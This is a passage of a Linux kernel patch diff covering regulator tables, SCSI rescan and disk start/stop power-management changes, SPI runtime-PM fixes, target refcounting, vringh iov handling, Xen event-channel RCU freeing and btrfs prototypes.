+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VMODEM_DBG0, 0x7f,
+-		    MT6358_VMODEM_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VMODEM_DBG0, 0x7f, MT6358_VMODEM_ANA_CON0, 8),
+ 	MT6366_BUCK("buck_vs1", VS1, 1000000, 2587500, 12500,
+-		    buck_volt_range4, 0x7f, MT6358_BUCK_VS1_DBG0, 0x7f,
+-		    MT6358_VS1_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VS1_DBG0, 0x7f, MT6358_VS1_ANA_CON0, 8),
+ 	MT6366_REG_FIXED("ldo_vrf12", VRF12,
+ 			 MT6358_LDO_VRF12_CON0, 0, 1200000),
+ 	MT6366_REG_FIXED("ldo_vio18", VIO18,
+@@ -673,21 +638,13 @@ static struct mt6358_regulator_info mt6366_regulators[] = {
+ 	MT6366_LDO("ldo_vsim2", VSIM2, vsim_voltages, vsim_idx,
+ 		   MT6358_LDO_VSIM2_CON0, 0, MT6358_VSIM2_ANA_CON0, 0xf00),
+ 	MT6366_LDO1("ldo_vsram_proc11", VSRAM_PROC11, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_PROC11_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON0, 0x7f),
++		    MT6358_LDO_VSRAM_PROC11_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON0, 0x7f),
+ 	MT6366_LDO1("ldo_vsram_others", VSRAM_OTHERS, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_OTHERS_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON2, 0x7f),
+-	MT6366_LDO1("ldo_vsram_others_sshub", VSRAM_OTHERS_SSHUB, 500000,
+-		    1293750, 6250, buck_volt_range1,
+-		    MT6358_LDO_VSRAM_OTHERS_SSHUB_CON1, 0x7f,
+-		    MT6358_LDO_VSRAM_OTHERS_SSHUB_CON1, 0x7f),
++		    MT6358_LDO_VSRAM_OTHERS_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON2, 0x7f),
+ 	MT6366_LDO1("ldo_vsram_gpu", VSRAM_GPU, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_GPU_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON3, 0x7f),
++		    MT6358_LDO_VSRAM_GPU_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON3, 0x7f),
+ 	MT6366_LDO1("ldo_vsram_proc12", VSRAM_PROC12, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_PROC12_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON1, 0x7f),
++		    MT6358_LDO_VSRAM_PROC12_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON1, 0x7f),
+ };
+ 
+ static int mt6358_regulator_probe(struct platform_device *pdev)
+diff --git a/drivers/s390/scsi/zfcp_aux.c b/drivers/s390/scsi/zfcp_aux.c
+index df782646e856f..ab2f35bc294da 100644
+--- a/drivers/s390/scsi/zfcp_aux.c
++++ b/drivers/s390/scsi/zfcp_aux.c
+@@ -518,12 +518,12 @@ struct zfcp_port *zfcp_port_enqueue(struct zfcp_adapter *adapter, u64 wwpn,
+ 	if (port) {
+ 		put_device(&port->dev);
+ 		retval = -EEXIST;
+-		goto err_out;
++		goto err_put;
+ 	}
+ 
+ 	port = kzalloc(sizeof(struct zfcp_port), GFP_KERNEL);
+ 	if (!port)
+-		goto err_out;
++		goto err_put;
+ 
+ 	rwlock_init(&port->unit_list_lock);
+ 	INIT_LIST_HEAD(&port->unit_list);
+@@ -546,7 +546,7 @@ struct zfcp_port *zfcp_port_enqueue(struct zfcp_adapter *adapter, u64 wwpn,
+ 
+ 	if (dev_set_name(&port->dev, "0x%016llx", (unsigned long long)wwpn)) {
+ 		kfree(port);
+-		goto err_out;
++		goto err_put;
+ 	}
+ 	retval = -EINVAL;
+ 
+@@ -563,7 +563,8 @@ struct zfcp_port *zfcp_port_enqueue(struct zfcp_adapter *adapter, u64 wwpn,
+ 
+ 	return port;
+ 
+-err_out:
++err_put:
+ 	zfcp_ccw_adapter_put(adapter);
++err_out:
+ 	return ERR_PTR(retval);
+ }
+diff --git a/drivers/scsi/aacraid/commsup.c b/drivers/scsi/aacraid/commsup.c
+index 3f062e4013ab6..013a9a334972e 100644
+--- a/drivers/scsi/aacraid/commsup.c
++++ b/drivers/scsi/aacraid/commsup.c
+@@ -1451,7 +1451,7 @@ retry_next:
+ #endif
+ 				break;
+ 			}
+-			scsi_rescan_device(&device->sdev_gendev);
++			scsi_rescan_device(device);
+ 			break;
+ 
+ 		default:
+diff --git a/drivers/scsi/mvumi.c b/drivers/scsi/mvumi.c
+index 05d3ce9b72dba..c4acf65379d20 100644
+--- a/drivers/scsi/mvumi.c
++++ b/drivers/scsi/mvumi.c
+@@ -1500,7 +1500,7 @@ static void mvumi_rescan_devices(struct mvumi_hba *mhba, int id)
+ 
+ 	sdev = scsi_device_lookup(mhba->shost, 0, id, 0);
+ 	if (sdev) {
+-		scsi_rescan_device(&sdev->sdev_gendev);
++		scsi_rescan_device(sdev);
+ 		scsi_device_put(sdev);
+ 	}
+ }
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index fb6e9a7a7f58b..d25e1c2472538 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -2445,7 +2445,7 @@ static void scsi_evt_emit(struct scsi_device *sdev, struct scsi_event *evt)
+ 		envp[idx++] = "SDEV_MEDIA_CHANGE=1";
+ 		break;
+ 	case SDEV_EVT_INQUIRY_CHANGE_REPORTED:
+-		scsi_rescan_device(&sdev->sdev_gendev);
++		scsi_rescan_device(sdev);
+ 		envp[idx++] = "SDEV_UA=INQUIRY_DATA_HAS_CHANGED";
+ 		break;
+ 	case SDEV_EVT_CAPACITY_CHANGE_REPORTED:
+diff --git a/drivers/scsi/scsi_priv.h b/drivers/scsi/scsi_priv.h
+index c52de9a973e46..b14545acb40f5 100644
+--- a/drivers/scsi/scsi_priv.h
++++ b/drivers/scsi/scsi_priv.h
+@@ -132,7 +132,6 @@ extern int scsi_complete_async_scans(void);
+ extern int scsi_scan_host_selected(struct Scsi_Host *, unsigned int,
+ 				   unsigned int, u64, enum scsi_scan_mode);
+ extern void scsi_forget_host(struct Scsi_Host *);
+-extern void scsi_rescan_device(struct device *);
+ 
+ /* scsi_sysctl.c */
+ #ifdef CONFIG_SYSCTL
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index d12f2dcb4040a..ed26c52ed8474 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1611,12 +1611,24 @@ int scsi_add_device(struct Scsi_Host *host, uint channel,
+ }
+ EXPORT_SYMBOL(scsi_add_device);
+ 
+-void scsi_rescan_device(struct device *dev)
++int scsi_rescan_device(struct scsi_device *sdev)
+ {
+-	struct scsi_device *sdev = to_scsi_device(dev);
++	struct device *dev = &sdev->sdev_gendev;
++	int ret = 0;
+ 
+ 	device_lock(dev);
+ 
++	/*
++	 * Bail out if the device is not running. Otherwise, the rescan may
++	 * block waiting for commands to be executed, with us holding the
++	 * device lock. This can result in a potential deadlock in the power
++	 * management core code when system resume is on-going.
++	 */
++	if (sdev->sdev_state != SDEV_RUNNING) {
++		ret = -EWOULDBLOCK;
++		goto unlock;
++	}
++
+ 	scsi_attach_vpd(sdev);
+ 
+ 	if (sdev->handler && sdev->handler->rescan)
+@@ -1629,7 +1641,11 @@ void scsi_rescan_device(struct device *dev)
+ 			drv->rescan(dev);
+ 		module_put(dev->driver->owner);
+ 	}
++
++unlock:
+ 	device_unlock(dev);
++
++	return ret;
+ }
+ EXPORT_SYMBOL(scsi_rescan_device);
+ 
+diff --git a/drivers/scsi/scsi_sysfs.c b/drivers/scsi/scsi_sysfs.c
+index cac7c902cf70a..1f531063d6331 100644
+--- a/drivers/scsi/scsi_sysfs.c
++++ b/drivers/scsi/scsi_sysfs.c
+@@ -762,7 +762,7 @@ static ssize_t
+ store_rescan_field (struct device *dev, struct device_attribute *attr,
+ 		    const char *buf, size_t count)
+ {
+-	scsi_rescan_device(dev);
++	scsi_rescan_device(to_scsi_device(dev));
+ 	return count;
+ }
+ static DEVICE_ATTR(rescan, S_IWUSR, NULL, store_rescan_field);
+@@ -855,7 +855,7 @@ store_state_field(struct device *dev, struct device_attribute *attr,
+ 		 * waiting for pending I/O to finish.
+ 		 */
+ 		blk_mq_run_hw_queues(sdev->request_queue, true);
+-		scsi_rescan_device(dev);
++		scsi_rescan_device(sdev);
+ 	}
+ 
+ 	return ret == 0 ? count : -EINVAL;
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index e934779bf05c8..30184f7b762c1 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -213,18 +213,32 @@ cache_type_store(struct device *dev, struct device_attribute *attr,
+ }
+ 
+ static ssize_t
+-manage_start_stop_show(struct device *dev, struct device_attribute *attr,
+-		       char *buf)
++manage_start_stop_show(struct device *dev,
++		       struct device_attribute *attr, char *buf)
+ {
+ 	struct scsi_disk *sdkp = to_scsi_disk(dev);
+ 	struct scsi_device *sdp = sdkp->device;
+ 
+-	return sprintf(buf, "%u\n", sdp->manage_start_stop);
++	return sysfs_emit(buf, "%u\n",
++			  sdp->manage_system_start_stop &&
++			  sdp->manage_runtime_start_stop);
+ }
++static DEVICE_ATTR_RO(manage_start_stop);
+ 
+ static ssize_t
+-manage_start_stop_store(struct device *dev, struct device_attribute *attr,
+-			const char *buf, size_t count)
++manage_system_start_stop_show(struct device *dev,
++			      struct device_attribute *attr, char *buf)
++{
++	struct scsi_disk *sdkp = to_scsi_disk(dev);
++	struct scsi_device *sdp = sdkp->device;
++
++	return sysfs_emit(buf, "%u\n", sdp->manage_system_start_stop);
++}
++
++static ssize_t
++manage_system_start_stop_store(struct device *dev,
++			       struct device_attribute *attr,
++			       const char *buf, size_t count)
+ {
+ 	struct scsi_disk *sdkp = to_scsi_disk(dev);
+ 	struct scsi_device *sdp = sdkp->device;
+@@ -236,11 +250,42 @@ manage_start_stop_store(struct device *dev, struct device_attribute *attr,
+ 	if (kstrtobool(buf, &v))
+ 		return -EINVAL;
+ 
+-	sdp->manage_start_stop = v;
++	sdp->manage_system_start_stop = v;
+ 
+ 	return count;
+ }
+-static DEVICE_ATTR_RW(manage_start_stop);
++static DEVICE_ATTR_RW(manage_system_start_stop);
++
++static ssize_t
++manage_runtime_start_stop_show(struct device *dev,
++			       struct device_attribute *attr, char *buf)
++{
++	struct scsi_disk *sdkp = to_scsi_disk(dev);
++	struct scsi_device *sdp = sdkp->device;
++
++	return sysfs_emit(buf, "%u\n", sdp->manage_runtime_start_stop);
++}
++
++static ssize_t
++manage_runtime_start_stop_store(struct device *dev,
++				struct device_attribute *attr,
++				const char *buf, size_t count)
++{
++	struct scsi_disk *sdkp = to_scsi_disk(dev);
++	struct scsi_device *sdp = sdkp->device;
++	bool v;
++
++	if (!capable(CAP_SYS_ADMIN))
++		return -EACCES;
++
++	if (kstrtobool(buf, &v))
++		return -EINVAL;
++
++	sdp->manage_runtime_start_stop = v;
++
++	return count;
++}
++static DEVICE_ATTR_RW(manage_runtime_start_stop);
+ 
+ static ssize_t
+ allow_restart_show(struct device *dev, struct device_attribute *attr, char *buf)
+@@ -572,6 +617,8 @@ static struct attribute *sd_disk_attrs[] = {
+ 	&dev_attr_FUA.attr,
+ 	&dev_attr_allow_restart.attr,
+ 	&dev_attr_manage_start_stop.attr,
++	&dev_attr_manage_system_start_stop.attr,
++	&dev_attr_manage_runtime_start_stop.attr,
+ 	&dev_attr_protection_type.attr,
+ 	&dev_attr_protection_mode.attr,
+ 	&dev_attr_app_tag_own.attr,
+@@ -3579,7 +3626,8 @@ static int sd_remove(struct device *dev)
+ 
+ 	device_del(&sdkp->disk_dev);
+ 	del_gendisk(sdkp->disk);
+-	sd_shutdown(dev);
++	if (!sdkp->suspended)
++		sd_shutdown(dev);
+ 
+ 	put_disk(sdkp->disk);
+ 	return 0;
+@@ -3652,13 +3700,20 @@ static void sd_shutdown(struct device *dev)
+ 		sd_sync_cache(sdkp, NULL);
+ 	}
+ 
+-	if (system_state != SYSTEM_RESTART && sdkp->device->manage_start_stop) {
++	if (system_state != SYSTEM_RESTART &&
++	    sdkp->device->manage_system_start_stop) {
+ 		sd_printk(KERN_NOTICE, sdkp, "Stopping disk\n");
+ 		sd_start_stop_device(sdkp, 0);
+ 	}
+ }
+ 
+-static int sd_suspend_common(struct device *dev, bool ignore_stop_errors)
++static inline bool sd_do_start_stop(struct scsi_device *sdev, bool runtime)
++{
++	return (sdev->manage_system_start_stop && !runtime) ||
++		(sdev->manage_runtime_start_stop && runtime);
++}
++
++static int sd_suspend_common(struct device *dev, bool runtime)
+ {
+ 	struct scsi_disk *sdkp = dev_get_drvdata(dev);
+ 	struct scsi_sense_hdr sshdr;
+@@ -3690,15 +3745,18 @@ static int sd_suspend_common(struct device *dev, bool ignore_stop_errors)
+ 		}
+ 	}
+ 
+-	if (sdkp->device->manage_start_stop) {
++	if (sd_do_start_stop(sdkp->device, runtime)) {
+ 		if (!sdkp->device->silence_suspend)
+ 			sd_printk(KERN_NOTICE, sdkp, "Stopping disk\n");
+ 		/* an error is not worth aborting a system sleep */
+ 		ret = sd_start_stop_device(sdkp, 0);
+-		if (ignore_stop_errors)
++		if (!runtime)
+ 			ret = 0;
+ 	}
+ 
++	if (!ret)
++		sdkp->suspended = true;
++
+ 	return ret;
+ }
+ 
+@@ -3707,29 +3765,37 @@ static int sd_suspend_system(struct device *dev)
+ 	if (pm_runtime_suspended(dev))
+ 		return 0;
+ 
+-	return sd_suspend_common(dev, true);
++	return sd_suspend_common(dev, false);
+ }
+ 
+ static int sd_suspend_runtime(struct device *dev)
+ {
+-	return sd_suspend_common(dev, false);
++	return sd_suspend_common(dev, true);
+ }
+ 
+-static int sd_resume(struct device *dev)
++static int sd_resume(struct device *dev, bool runtime)
+ {
+ 	struct scsi_disk *sdkp = dev_get_drvdata(dev);
+-	int ret;
++	int ret = 0;
+ 
+ 	if (!sdkp)	/* E.g.: runtime resume at the start of sd_probe() */
+ 		return 0;
+ 
+-	if (!sdkp->device->manage_start_stop)
++	if (!sd_do_start_stop(sdkp->device, runtime)) {
++		sdkp->suspended = false;
+ 		return 0;
++	}
+ 
+-	sd_printk(KERN_NOTICE, sdkp, "Starting disk\n");
+-	ret = sd_start_stop_device(sdkp, 1);
+-	if (!ret)
++	if (!sdkp->device->no_start_on_resume) {
++		sd_printk(KERN_NOTICE, sdkp, "Starting disk\n");
++		ret = sd_start_stop_device(sdkp, 1);
++	}
++
++	if (!ret) {
+ 		opal_unlock_from_suspend(sdkp->opal_dev);
++		sdkp->suspended = false;
++	}
++
+ 	return ret;
+ }
+ 
+@@ -3738,7 +3804,7 @@ static int sd_resume_system(struct device *dev)
+ 	if (pm_runtime_suspended(dev))
+ 		return 0;
+ 
+-	return sd_resume(dev);
++	return sd_resume(dev, false);
+ }
+ 
+ static int sd_resume_runtime(struct device *dev)
+@@ -3762,7 +3828,7 @@ static int sd_resume_runtime(struct device *dev)
+ 				  "Failed to clear sense data\n");
+ 	}
+ 
+-	return sd_resume(dev);
++	return sd_resume(dev, true);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/sd.h b/drivers/scsi/sd.h
+index 5eea762f84d18..409dda5350d10 100644
+--- a/drivers/scsi/sd.h
++++ b/drivers/scsi/sd.h
+@@ -131,6 +131,7 @@ struct scsi_disk {
+ 	u8		provisioning_mode;
+ 	u8		zeroing_mode;
+ 	u8		nr_actuators;		/* Number of actuators */
++	bool		suspended;	/* Disk is suspended (stopped) */
+ 	unsigned	ATO : 1;	/* state of disk ATO bit */
+ 	unsigned	cache_override : 1; /* temp override of WCE,RCD */
+ 	unsigned	WCE : 1;	/* state of disk WCE bit */
+diff --git a/drivers/scsi/smartpqi/smartpqi_init.c b/drivers/scsi/smartpqi/smartpqi_init.c
+index 9f0f69c1ed665..47d487729635c 100644
+--- a/drivers/scsi/smartpqi/smartpqi_init.c
++++ b/drivers/scsi/smartpqi/smartpqi_init.c
+@@ -2278,7 +2278,7 @@ static void pqi_update_device_list(struct pqi_ctrl_info *ctrl_info,
+ 			device->advertised_queue_depth = device->queue_depth;
+ 			scsi_change_queue_depth(device->sdev, device->advertised_queue_depth);
+ 			if (device->rescan) {
+-				scsi_rescan_device(&device->sdev->sdev_gendev);
++				scsi_rescan_device(device->sdev);
+ 				device->rescan = false;
+ 			}
+ 		}
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 7a1dc5c7c49ee..c2d981d5a2dd5 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -471,7 +471,7 @@ static void storvsc_device_scan(struct work_struct *work)
+ 	sdev = scsi_device_lookup(wrk->host, 0, wrk->tgt_id, wrk->lun);
+ 	if (!sdev)
+ 		goto done;
+-	scsi_rescan_device(&sdev->sdev_gendev);
++	scsi_rescan_device(sdev);
+ 	scsi_device_put(sdev);
+ 
+ done:
+diff --git a/drivers/scsi/virtio_scsi.c b/drivers/scsi/virtio_scsi.c
+index 2a79ab16134b1..3f8c553f3d91e 100644
+--- a/drivers/scsi/virtio_scsi.c
++++ b/drivers/scsi/virtio_scsi.c
+@@ -325,7 +325,7 @@ static void virtscsi_handle_param_change(struct virtio_scsi *vscsi,
+ 	/* Handle "Parameters changed", "Mode parameters changed", and
+ 	   "Capacity data has changed".  */
+ 	if (asc == 0x2a && (ascq == 0x00 || ascq == 0x01 || ascq == 0x09))
+-		scsi_rescan_device(&sdev->sdev_gendev);
++		scsi_rescan_device(sdev);
+ 
+ 	scsi_device_put(sdev);
+ }
+diff --git a/drivers/spi/spi-zynqmp-gqspi.c b/drivers/spi/spi-zynqmp-gqspi.c
+index c760aac070e54..3b56d5e7080e1 100644
+--- a/drivers/spi/spi-zynqmp-gqspi.c
++++ b/drivers/spi/spi-zynqmp-gqspi.c
+@@ -1218,9 +1218,9 @@ static int zynqmp_qspi_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ clk_dis_all:
+-	pm_runtime_put_sync(&pdev->dev);
+-	pm_runtime_set_suspended(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
++	pm_runtime_put_noidle(&pdev->dev);
++	pm_runtime_set_suspended(&pdev->dev);
+ 	clk_disable_unprepare(xqspi->refclk);
+ clk_dis_pclk:
+ 	clk_disable_unprepare(xqspi->pclk);
+@@ -1244,11 +1244,15 @@ static int zynqmp_qspi_remove(struct platform_device *pdev)
+ {
+ 	struct zynqmp_qspi *xqspi = platform_get_drvdata(pdev);
+ 
++	pm_runtime_get_sync(&pdev->dev);
++
+ 	zynqmp_gqspi_write(xqspi, GQSPI_EN_OFST, 0x0);
++
++	pm_runtime_disable(&pdev->dev);
++	pm_runtime_put_noidle(&pdev->dev);
++	pm_runtime_set_suspended(&pdev->dev);
+ 	clk_disable_unprepare(xqspi->refclk);
+ 	clk_disable_unprepare(xqspi->pclk);
+-	pm_runtime_set_suspended(&pdev->dev);
+-	pm_runtime_disable(&pdev->dev);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/target/target_core_device.c b/drivers/target/target_core_device.c
+index d21f88de197c7..301fe376a1206 100644
+--- a/drivers/target/target_core_device.c
++++ b/drivers/target/target_core_device.c
+@@ -883,7 +883,6 @@ sector_t target_to_linux_sector(struct se_device *dev, sector_t lb)
+ EXPORT_SYMBOL(target_to_linux_sector);
+ 
+ struct devices_idr_iter {
+-	struct config_item *prev_item;
+ 	int (*fn)(struct se_device *dev, void *data);
+ 	void *data;
+ };
+@@ -893,11 +892,9 @@ static int target_devices_idr_iter(int id, void *p, void *data)
+ {
+ 	struct devices_idr_iter *iter = data;
+ 	struct se_device *dev = p;
++	struct config_item *item;
+ 	int ret;
+ 
+-	config_item_put(iter->prev_item);
+-	iter->prev_item = NULL;
+-
+ 	/*
+ 	 * We add the device early to the idr, so it can be used
+ 	 * by backend modules during configuration. We do not want
+@@ -907,12 +904,13 @@ static int target_devices_idr_iter(int id, void *p, void *data)
+ 	if (!target_dev_configured(dev))
+ 		return 0;
+ 
+-	iter->prev_item = config_item_get_unless_zero(&dev->dev_group.cg_item);
+-	if (!iter->prev_item)
++	item = config_item_get_unless_zero(&dev->dev_group.cg_item);
++	if (!item)
+ 		return 0;
+ 	mutex_unlock(&device_mutex);
+ 
+ 	ret = iter->fn(dev, iter->data);
++	config_item_put(item);
+ 
+ 	mutex_lock(&device_mutex);
+ 	return ret;
+@@ -935,7 +933,6 @@ int target_for_each_device(int (*fn)(struct se_device *dev, void *data),
+ 	mutex_lock(&device_mutex);
+ 	ret = idr_for_each(&devices_idr, target_devices_idr_iter, &iter);
+ 	mutex_unlock(&device_mutex);
+-	config_item_put(iter.prev_item);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/vhost/vringh.c b/drivers/vhost/vringh.c
+index 33eb941fcf154..10bfc5f1c50d5 100644
+--- a/drivers/vhost/vringh.c
++++ b/drivers/vhost/vringh.c
+@@ -123,8 +123,18 @@ static inline ssize_t vringh_iov_xfer(struct vringh *vrh,
+ 		done += partlen;
+ 		len -= partlen;
+ 		ptr += partlen;
++		iov->consumed += partlen;
++		iov->iov[iov->i].iov_len -= partlen;
++		iov->iov[iov->i].iov_base += partlen;
+ 
+-		vringh_kiov_advance(iov, partlen);
++		if (!iov->iov[iov->i].iov_len) {
++			/* Fix up old iov element then increment. */
++			iov->iov[iov->i].iov_len = iov->consumed;
++			iov->iov[iov->i].iov_base -= iov->consumed;
++
++			iov->consumed = 0;
++			iov->i++;
++		}
+ 	}
+ 	return done;
+ }
+diff --git a/drivers/xen/events/events_base.c b/drivers/xen/events/events_base.c
+index c443f04aaad77..80b46de14f413 100644
+--- a/drivers/xen/events/events_base.c
++++ b/drivers/xen/events/events_base.c
+@@ -33,6 +33,7 @@
+ #include <linux/slab.h>
+ #include <linux/irqnr.h>
+ #include <linux/pci.h>
++#include <linux/rcupdate.h>
+ #include <linux/spinlock.h>
+ #include <linux/cpuhotplug.h>
+ #include <linux/atomic.h>
+@@ -96,6 +97,7 @@ enum xen_irq_type {
+ struct irq_info {
+ 	struct list_head list;
+ 	struct list_head eoi_list;
++	struct rcu_work rwork;
+ 	short refcnt;
+ 	u8 spurious_cnt;
+ 	u8 is_accounted;
+@@ -145,23 +147,13 @@ const struct evtchn_ops *evtchn_ops;
+  */
+ static DEFINE_MUTEX(irq_mapping_update_lock);
+ 
+-/*
+- * Lock protecting event handling loop against removing event channels.
+- * Adding of event channels is no issue as the associated IRQ becomes active
+- * only after everything is setup (before request_[threaded_]irq() the handler
+- * can't be entered for an event, as the event channel will be unmasked only
+- * then).
+- */
+-static DEFINE_RWLOCK(evtchn_rwlock);
+-
+ /*
+  * Lock hierarchy:
+  *
+  * irq_mapping_update_lock
+- *   evtchn_rwlock
+- *     IRQ-desc lock
+- *       percpu eoi_list_lock
+- *         irq_info->lock
++ *   IRQ-desc lock
++ *     percpu eoi_list_lock
++ *       irq_info->lock
+  */
+ 
+ static LIST_HEAD(xen_irq_list_head);
+@@ -305,6 +297,22 @@ static void channels_on_cpu_inc(struct irq_info *info)
+ 	info->is_accounted = 1;
+ }
+ 
++static void delayed_free_irq(struct work_struct *work)
++{
++	struct irq_info *info = container_of(to_rcu_work(work), struct irq_info,
++					     rwork);
++	unsigned int irq = info->irq;
++
++	/* Remove the info pointer only now, with no potential users left. */
++	set_info_for_irq(irq, NULL);
++
++	kfree(info);
++
++	/* Legacy IRQ descriptors are managed by the arch. */
++	if (irq >= nr_legacy_irqs())
++		irq_free_desc(irq);
++}
++
+ /* Constructors for packed IRQ information. */
+ static int xen_irq_info_common_setup(struct irq_info *info,
+ 				     unsigned irq,
+@@ -667,33 +675,36 @@ static void xen_irq_lateeoi_worker(struct work_struct *work)
+ 
+ 	eoi = container_of(to_delayed_work(work), struct lateeoi_work, delayed);
+ 
+-	read_lock_irqsave(&evtchn_rwlock, flags);
++	rcu_read_lock();
+ 
+ 	while (true) {
+-		spin_lock(&eoi->eoi_list_lock);
++		spin_lock_irqsave(&eoi->eoi_list_lock, flags);
+ 
+ 		info = list_first_entry_or_null(&eoi->eoi_list, struct irq_info,
+ 						eoi_list);
+ 
+-		if (info == NULL || now < info->eoi_time) {
+-			spin_unlock(&eoi->eoi_list_lock);
++		if (info == NULL)
++			break;
++
++		if (now < info->eoi_time) {
++			mod_delayed_work_on(info->eoi_cpu, system_wq,
++					    &eoi->delayed,
++					    info->eoi_time - now);
+ 			break;
+ 		}
+ 
+ 		list_del_init(&info->eoi_list);
+ 
+-		spin_unlock(&eoi->eoi_list_lock);
++		spin_unlock_irqrestore(&eoi->eoi_list_lock, flags);
+ 
+ 		info->eoi_time = 0;
+ 
+ 		xen_irq_lateeoi_locked(info, false);
+ 	}
+ 
+-	if (info)
+-		mod_delayed_work_on(info->eoi_cpu, system_wq,
+-				    &eoi->delayed, info->eoi_time - now);
++	spin_unlock_irqrestore(&eoi->eoi_list_lock, flags);
+ 
+-	read_unlock_irqrestore(&evtchn_rwlock, flags);
++	rcu_read_unlock();
+ }
+ 
+ static void xen_cpu_init_eoi(unsigned int cpu)
+@@ -708,16 +719,15 @@ static void xen_cpu_init_eoi(unsigned int cpu)
+ void xen_irq_lateeoi(unsigned int irq, unsigned int eoi_flags)
+ {
+ 	struct irq_info *info;
+-	unsigned long flags;
+ 
+-	read_lock_irqsave(&evtchn_rwlock, flags);
++	rcu_read_lock();
+ 
+ 	info = info_for_irq(irq);
+ 
+ 	if (info)
+ 		xen_irq_lateeoi_locked(info, eoi_flags & XEN_EOI_FLAG_SPURIOUS);
+ 
+-	read_unlock_irqrestore(&evtchn_rwlock, flags);
++	rcu_read_unlock();
+ }
+ EXPORT_SYMBOL_GPL(xen_irq_lateeoi);
+ 
+@@ -731,6 +741,7 @@ static void xen_irq_init(unsigned irq)
+ 
+ 	info->type = IRQT_UNBOUND;
+ 	info->refcnt = -1;
++	INIT_RCU_WORK(&info->rwork, delayed_free_irq);
+ 
+ 	set_info_for_irq(irq, info);
+ 	/*
+@@ -788,31 +799,18 @@ static int __must_check xen_allocate_irq_gsi(unsigned gsi)
+ static void xen_free_irq(unsigned irq)
+ {
+ 	struct irq_info *info = info_for_irq(irq);
+-	unsigned long flags;
+ 
+ 	if (WARN_ON(!info))
+ 		return;
+ 
+-	write_lock_irqsave(&evtchn_rwlock, flags);
+-
+ 	if (!list_empty(&info->eoi_list))
+ 		lateeoi_list_del(info);
+ 
+ 	list_del(&info->list);
+ 
+-	set_info_for_irq(irq, NULL);
+-
+ 	WARN_ON(info->refcnt > 0);
+ 
+-	write_unlock_irqrestore(&evtchn_rwlock, flags);
+-
+-	kfree(info);
+-
+-	/* Legacy IRQ descriptors are managed by the arch. */
+-	if (irq < nr_legacy_irqs())
+-		return;
+-
+-	irq_free_desc(irq);
++	queue_rcu_work(system_wq, &info->rwork);
+ }
+ 
+ static void xen_evtchn_close(evtchn_port_t port)
+@@ -1716,7 +1714,14 @@ static void __xen_evtchn_do_upcall(void)
+ 	int cpu = smp_processor_id();
+ 	struct evtchn_loop_ctrl ctrl = { 0 };
+ 
+-	read_lock(&evtchn_rwlock);
++	/*
++	 * When closing an event channel the associated IRQ must not be freed
++	 * until all cpus have left the event handling loop. This is ensured
++	 * by taking the rcu_read_lock() while handling events, as freeing of
++	 * the IRQ is handled via queue_rcu_work() _after_ closing the event
++	 * channel.
++	 */
++	rcu_read_lock();
+ 
+ 	do {
+ 		vcpu_info->evtchn_upcall_pending = 0;
+@@ -1729,7 +1734,7 @@ static void __xen_evtchn_do_upcall(void)
+ 
+ 	} while (vcpu_info->evtchn_upcall_pending);
+ 
+-	read_unlock(&evtchn_rwlock);
++	rcu_read_unlock();
+ 
+ 	/*
+ 	 * Increment irq_epoch only now to defer EOIs only for
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index 3bcef0c4d6fc4..27d06bb5e5c05 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -28,6 +28,7 @@
+ #include <linux/refcount.h>
+ #include <linux/crc32c.h>
+ #include <linux/iomap.h>
++#include <linux/fscrypt.h>
+ #include "extent-io-tree.h"
+ #include "extent_io.h"
+ #include "extent_map.h"
+@@ -3238,11 +3239,11 @@ static inline void btrfs_clear_sb_rdonly(struct super_block *sb)
+ 
+ /* root-item.c */
+ int btrfs_add_root_ref(struct btrfs_trans_handle *trans, u64 root_id,
+-		       u64 ref_id, u64 dirid, u64 sequence, const char *name,
+-		       int name_len);
++		       u64 ref_id, u64 dirid, u64 sequence,
++		       const struct fscrypt_str *name);
+ int btrfs_del_root_ref(struct btrfs_trans_handle *trans, u64 root_id,
+-		       u64 ref_id, u64 dirid, u64 *sequence, const char *name,
+-		       int name_len);
++		       u64 ref_id, u64 dirid, u64 *sequence,
++		       const struct fscrypt_str *name);
+ int btrfs_del_root(struct btrfs_trans_handle *trans,
+ 		   const struct btrfs_key *key);
+ int btrfs_insert_root(struct btrfs_trans_handle *trans, struct btrfs_root *root,
+@@ -3271,25 +3272,23 @@ int btrfs_uuid_tree_iterate(struct btrfs_fs_info *fs_info);
+ 
+ /* dir-item.c */
+ int btrfs_check_dir_item_collision(struct btrfs_root *root, u64 dir,
+-			  const char *name, int name_len);
+-int btrfs_insert_dir_item(struct btrfs_trans_handle *trans, const char *name,
+-			  int name_len, struct btrfs_inode *dir,
